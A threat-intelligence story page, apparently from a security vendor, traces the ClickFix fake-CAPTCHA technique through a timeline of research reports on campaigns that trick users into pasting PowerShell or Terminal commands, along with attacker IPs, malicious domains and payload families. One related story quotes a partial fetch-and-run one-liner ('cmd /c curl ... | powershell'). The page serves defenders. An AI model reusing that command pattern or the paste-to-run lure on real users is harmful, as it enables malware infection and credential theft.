ClickFix Social-Engineering Technique Using Fake CAPTCHA to Trigger Manual Command Execution
A ClickFix-style malware campaign has been observed using fake CAPTCHA pages on compromised websites to trick users into manually executing malicious commands, enabling initial access while evading controls that focus on downloaded files. In the reported activity, victims are prompted to copy a PowerShell command and run it themselves; the script then downloads additional stages from attacker infrastructure (including 91.92.240.219), verifies user interaction by checking clipboard activity, and proceeds through a multi-stage infection chain. The payload is an information stealer targeting data from 25+ web browsers, cryptocurrency wallets (e.g., MetaMask), and enterprise VPN configurations, with checks for virtualized environments and security tooling prior to exfiltration.
Separately reported threat activity in the same time window includes UnsolicitedBooker targeting Central Asian telecoms with phishing-delivered backdoors (LuciDoor and MarsSnake) and APT28 running Operation MacroMaze, which uses weaponized Office documents and INCLUDEPICTURE fields pointing to webhook[.]site URLs as a tracking mechanism and to support follow-on macro-based payload delivery. A video-style weekly briefing also mentions an evolution of ClickFix where an initial command uses nslookup and parses the response for execution, but it is a multi-topic roundup rather than a primary source on the fake-CAPTCHA infostealer campaign; a malware newsletter roundup is likewise a link collection and does not add specific, corroborating details about the ClickFix CAPTCHA infostealer operation.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
32 events from the most recent confirmed update back to the earliest known activity.
Cloudflare Pages-hosted ClickFix campaign delivers Lumma Stealer
Researchers reported a ClickFix-style campaign using Cloudflare Pages sites such as zipsage.pages[.]dev to impersonate an Adobe activation guide and trick users into running a PowerShell command. The infection chain fetched additional payloads from get-1o8.pages[.]dev, dropped and executed putty.exe, and showed Lumma Stealer-like network traffic to multiple .lat domains, with indicators including URLs, domains, file path, and an MD5 hash published.
ACSC warns of ClickFix campaign delivering Vidar Stealer
The Australian Cyber Security Centre warned organizations about an ongoing ClickFix campaign in which fake CAPTCHA or browser-verification prompts on compromised websites, particularly WordPress sites, trick users into running malicious PowerShell that installs Vidar Stealer. The advisory noted Vidar’s use of in-memory execution and dead-drop C2 discovery via public services such as Telegram bots and Steam profiles, and urged defenders to restrict PowerShell and patch WordPress components.
CyberProof identifies ClickFix variant using cmdkey and regsvr32
CyberProof researchers reported a new ClickFix variant that uses a fake Cloudflare CAPTCHA to trick victims into pasting a command into Windows Run, but replaces PowerShell with native Windows tools cmdkey and regsvr32. The attack loads a DLL from an attacker-controlled SMB share via a UNC path, executes it filelessly, and establishes persistence through a remotely fetched scheduled task named "RunNotepadNow."
LevelBlue details ErrTraffic v3 EtherHiding ClickFix campaign
LevelBlue SpiderLabs reported that ErrTraffic v3, a traffic distribution system advertised on cybercrime forums in early 2026, was being used in ClickFix campaigns targeting compromised WordPress sites. The campaign used a PHP must-use plugin backdoor, obfuscated JavaScript injections, and Polygon smart contracts for EtherHiding-based infrastructure retrieval to deliver Windows and macOS lures such as fake BSOD, reCAPTCHA, and Cloudflare verification pages.
ReliaQuest documents ClickFix intrusion using PySoxy proxying
ReliaQuest reported that in April 2026 a ClickFix intrusion from a compromised website led a user to run an obfuscated PowerShell stager that established scheduled-task persistence, deployed a lightweight in-memory PowerShell RAT, and performed domain reconnaissance. The attackers then downloaded and executed PySoxy, an open-source Python SOCKS5 proxy, over SSL on port 443 to create a redundant encrypted access path that could survive blocked outbound callbacks.
Suspected Cloudflare edge compromise used for pastejacking attack
A March 2026 case study described a malicious reCAPTCHA-style prompt appearing on a static Astro website, with the author concluding the payload was injected at the Cloudflare delivery layer rather than from the origin server. The incident was characterized as a living-off-the-land pastejacking attack enabled through a compromised Cloudflare account or edge configuration.
Recorded Future links ClickFix clusters to Windows and macOS malware campaigns
Recorded Future’s Insikt Group reported five distinct ClickFix clusters using fake verification pages to trick victims into pasting malicious commands into Windows Run or macOS Terminal. The report linked the activity to cybercriminal operations and possible state-backed actors including APT28 and North Korea’s PurpleBravo, with payloads including NetSupport RAT, Odyssey Stealer, Lumma Stealer, and MacSync.
Researchers document SmartApeSG ClickFix campaign delivering four malware families
Internet Storm Center researchers observed the SmartApeSG (also tracked as ZPHP and HANEYMANEY) ClickFix campaign active on compromised websites as recently as 2026-03-24. They documented a single infection session that sequentially delivered Remcos RAT, NetSupport RAT, StealC, and Sectop RAT via fake CAPTCHA social engineering and staged payloads over several hours.
Stormshield investigates MIMICRAT ClickFix campaign
Stormshield published an investigation into a ClickFix campaign delivering MIMICRAT, adding a new malware family to the set of payloads observed through fake verification and paste-to-run social-engineering lures. The report represents a distinct technical disclosure about ClickFix activity rather than a repeat of previously documented Lumma, NetSupport RAT, StealC, or Vidar campaigns.
Breakglass details ClickFix campaign delivering NetSupport RAT v14.10
Breakglass Intelligence analyzed a March 2026 ClickFix campaign that used fake CAPTCHA pages to trick victims into running a PowerShell command or MSI installer that deployed NetSupport RAT v14.10. The report documented delivery from applicationhost17.com, persistence via an HKCU Run key, C2 traffic to 172.94.9.4:443, per-victim tracking IDs, and rapidly rotated hosting infrastructure.
Microsoft reports ClickFix campaign spreading Lumma infostealer
Microsoft disclosed a ClickFix social-engineering campaign that used fake CAPTCHA or verification prompts to trick users into executing malicious commands, resulting in Lumma infostealer infection. The disclosure added Microsoft’s visibility into the growing abuse of ClickFix for credential and data theft.
BlackFog identifies Venom Stealer ClickFix MaaS campaign
BlackFog reported Venom Stealer as a malware-as-a-service platform using ClickFix-style lures such as fake CAPTCHA, update, SSL, and font-installation prompts on Windows and macOS. The stealer was described as persistently monitoring for newly saved Chrome credentials, bypassing Chrome protections via the CMSTPLUA COM interface, and supporting cryptocurrency wallet cracking and draining, with multiple updates observed in March 2026.
Polish police arrest suspect tied to Phobos ransomware
Polish authorities arrested a 47-year-old man in the Małopolska region for alleged links to the Phobos ransomware operation and seized devices containing hacking tools and stolen data.
ClickFix variant updated to use nslookup in initial execution
A later update to the widely observed ClickFix technique changed the initial command so it used nslookup to retrieve content that was then parsed and executed through the Windows Run dialog social-engineering flow.
KEENADU Android malware found pre-installed in tablets
Kaspersky reported that KEENADU Android malware was being pre-installed in tablet firmware before the devices were sold to consumers, indicating supply-chain style compromise affecting Android tablets.
Binary Defense reports ClickFix intrusion leading to Python-based interactive access
Binary Defense published research describing a ClickFix intrusion used by an access-broker-style operator to gain initial access and transition into interactive post-compromise activity using Python-based tooling. The report adds a distinct hands-on-keyboard intrusion pattern to prior ClickFix reporting that had focused mainly on malware delivery and specific payload families.
CERT Polska warns fake CAPTCHA attacks can lead to enterprise-wide ransomware
CERT Polska published a report describing ClickFix-style fake CAPTCHA attacks as an intrusion path that can escalate from user-executed commands to ransomware capable of encrypting an entire company. The report framed the technique as an active threat beyond infostealer delivery, highlighting its potential for full organizational compromise.
Sophos links ClickFix to StealC and Qilin deployment
Sophos reported that the ClickFix social-engineering technique was being used to deploy StealC and associated activity tied to the Qilin ransomware operation. This added a ransomware-linked deployment chain to the growing set of malware families observed using fake CAPTCHA and paste-to-run lures.
Researchers identify updated ClickFix infostealer campaign
In early 2026, researchers identified a ClickFix-style campaign using fake CAPTCHA pages on compromised websites to trick users into manually running malicious PowerShell, leading to a multi-stage infostealer infection chain.
Rapid7 links 250+ compromised WordPress sites to ClickFix infostealer campaign
Rapid7 reported a large-scale campaign in which attackers compromised more than 250 legitimate WordPress websites across at least 12 countries and used fake Cloudflare CAPTCHA prompts to trick visitors into executing ClickFix-style commands. The operation, active in its current form since at least December 2025, delivered infostealers targeting credentials, cookies, and cryptocurrency wallets, and Rapid7 said it notified US authorities to aid investigation and remediation.
ARKANIX STEALER observed in the wild
Researchers reported the ARKANIX STEALER infostealer family as active in late 2025, primarily distributed through Discord communities and underground forums while posing as legitimate utilities.
Splunk publishes ClickFix analysis and releases ClickGrab and PasteEater
Splunk published an analysis of Fake CAPTCHA/ClickFix campaigns describing clipboard hijacking, fake reCAPTCHA lures, and hidden PowerShell execution patterns used to deliver malware. The company also introduced two defensive tools, ClickGrab for infrastructure and IOC analysis and PasteEater for detecting suspicious browser-origin clipboard content on Windows.
ClickFix targeted restaurant reservation systems
An earlier ClickFix campaign targeted restaurant reservation systems, establishing a precursor to later fake-CAPTCHA social-engineering activity. The reporting places this activity in July 2025.
Rewterz reports ClickFix-style pages delivering NetSupport RAT
Rewterz published a threat advisory on a campaign using spoofed verification pages to trick users into executing malicious actions that result in NetSupport RAT infection. The advisory included active indicators of compromise, adding technical detection details for this NetSupport-linked ClickFix activity.
Fake CAPTCHA campaign reported delivering EDDIESTEALER
Cyber Security News reported a ClickFix-style fake CAPTCHA campaign delivering EDDIESTEALER, a Rust-based infostealer. The report adds a new malware family to the set of payloads observed using paste-to-run social-engineering lures.
APT36-linked ClickFix campaign reported targeting Linux systems
A LinuxSecurity report said ClickFix attacks had expanded to target Linux systems, marking a notable shift beyond the predominantly Windows-focused campaigns previously documented. The report associated this Linux-targeting activity with APT36, adding an attribution and platform-expansion development to the ClickFix story.
NCC Group documents May 2025 ClickFix attack delivering Lumma Stealer
NCC Group reported that in May 2025 a user was redirected from astapowerproject[.]net through malicious sites to a fake CAPTCHA page using the ClickFix technique, leading the victim to run PowerShell via Windows Run. The intrusion delivered Lumma C2 Stealer along with additional payloads, used mshta.exe and obfuscated PowerShell, targeted Chrome and Edge credential stores, and communicated with infrastructure including blameaowi[.]run.
Kroll details rapid evolution of ClearFake delivery chain
Kroll published research on the CLEARFAKE threat cluster, describing how its delivery mechanisms had evolved into a ClickFix-style fake verification workflow used to socially engineer users into executing malicious commands. The report added technical detail on the development of ClearFake as a distinct malware delivery framework prior to the later Web3-enabled variant documented by Sekoia.
ClickFix technique becomes globally widespread
Traficom states that the ClickFix social-engineering technique, first observed in late 2023, became significantly more widespread worldwide by the end of 2024. The technique tricks users into pasting attacker-supplied commands into Windows Run or similar interfaces, enabling malware execution.
Sekoia documents Web3-enabled ClearFake ClickFix variant
Sekoia reported that from December 2024 through February 2025, an evolved ClearFake framework used compromised websites, fake Cloudflare Turnstile and reCAPTCHA prompts, and Binance Smart Chain-hosted components to trick users into executing malicious PowerShell. The campaign dynamically assembled infection chains using blockchain-stored configuration and delivered malware including Emmenhtal Loader v2, Lumma Stealer, and Vidar Stealer, with more than 9,300 compromised websites identified by 2025-02-24.
John Hammond publishes fake reCAPTCHA ClickFix proof of concept
John Hammond published a write-up and GitHub repository demonstrating a fake 'Verify you are human' or reCAPTCHA lure that preloads a malicious command into the clipboard and instructs users to open Windows Run and paste it. The proof of concept recreated a technique reportedly seen in the wild in August and September 2024 and included standalone HTML and HTA examples showing local command execution.
Censys documents ClickFix campaign delivering XWorm V5.6
A Censys report described a ClickFix web-delivered malware campaign that used a five-stage infection chain to deliver XWorm V5.6. The report highlighted HTTP body hunting as the technique-based method used to identify and investigate the activity.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
50 references tracked. Mallory keeps watching after this page renders.
ClickFix Site Abusing Cloudflare Pages to Deliver Lumma Stealer - Malware Analysis - Malware Analysis, News and Indicators
malware.news
Open sourceClickFix Site Abusing Cloudflare Pages to Deliver Lumma Stealer - Malware Analysis, Phishing, and Email Scams
malwr-analysis.com
Open sourceGitHub - MHaggis/ClickGrab: Finding ClickFix and FakeCAPTCHA like it's 1999 · GitHub
github.com
Open sourceMicrosoft’s MSHTA Legacy Tool Still Powers Malware Campaigns on Windows | Community Portal | Gurucul
community.gurucul.com
Open sourceNew Rust-based InfoStealer via Fake CAPTCHA Delivers EDDIESTEALER - Cyber Security News
cybersecuritynews.com
Open sourceAPT36: ClickFix Campaign Targets Linux Systems - Evolving Threat Landscape
linuxsecurity.com
Open sourceThe Rapid Evolution of CLEARFAKE Delivery
kroll.com
Open sourceClearFake’s New Widespread Variant: Increased Web3 Exploitation for Malware Delivery - Sekoia.io Blog
blog.sekoia.io
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
Mar 21, 2026
ClickFix Social-Engineering Campaigns Using Fake CAPTCHA and Fake Installer Pages
Security researchers reported multiple **ClickFix** campaigns that compromise endpoints by tricking users into manually executing attacker-provided commands rather than exploiting a software vulnerability. CERT Polska documented an incident response at a large Polish organization where a **fake CAPTCHA** prompt led a user to run a malicious snippet via *Win+R*, resulting in malware execution and suspected **DLL side-loading** from `%APPDATA%\Intel` (legitimate `igfxSDK.exe`/`version.dll` alongside a suspicious `wtsapi32.dll`). Investigators also identified additional suspicious DLLs in the user’s local AppData and recovered an execution trail consistent with a one-liner that fetched remote content and piped it into PowerShell (e.g., `cmd /c curl ... | powershell`). Separately, threat hunting research described a macOS-focused ClickFix operation using **typosquatted Homebrew** lookalike sites to present a “copy/paste” install command that runs in Terminal. The first-stage script repeatedly prompted for a password and validated it using `dscl authonly` to harvest working credentials before deploying a second-stage infostealer dubbed **Cuckoo Stealer**, which was reported to establish **LaunchAgent** persistence, remove quarantine attributes, and communicate over encrypted HTTPS C2 while targeting browser credentials/session tokens, Keychain data, notes/messaging artifacts, VPN/FTP configs, and cryptocurrency wallets. Both reports highlight ClickFix as an increasingly common, opportunistic initial access technique that scales by abusing trusted user workflows on Windows and macOS.
Mar 21, 2026
Fake CAPTCHA (ClickFix) Social Engineering Used for Fileless Malware Delivery
Security researchers reported an active malware distribution technique that abuses **bogus CAPTCHA** pages to trick users into executing attacker-supplied commands on Windows. In the **ClearFake** campaign analyzed by Expel, victims land on a compromised site and are instructed to press `Win + R`, then paste and run a clipboard-seeded command—an approach commonly referred to as **ClickFix**—which results in malicious **PowerShell** execution. The campaign emphasizes *living-off-the-land* tradecraft and evasion, including **proxy execution** by abusing the trusted Windows script `C:\Windows\System32\SyncAppvPublishingServer.vbs` to launch PowerShell in hidden mode and reduce the chance of AV detection. Separate measurement and telemetry on the same broader tactic found large-scale infrastructure supporting fake CAPTCHA lures: a Censys analysis identified **9,494** breached websites hosting counterfeit verification pages, with ~**70%** appearing nearly identical. The most common infection mechanisms involved **clipboard manipulation** leading to **VBScript** and **PowerShell** execution (with significant counts of each observed), alongside other delivery paths such as `MSIEXEC`-based installation of malicious Windows Installer packages. Researchers also observed use of the **Matrix** push command-and-control framework to support **fileless** deployment, noting that these intrusions can leave no traditional executable artifacts and may evade signature-based detection.
Mar 21, 2026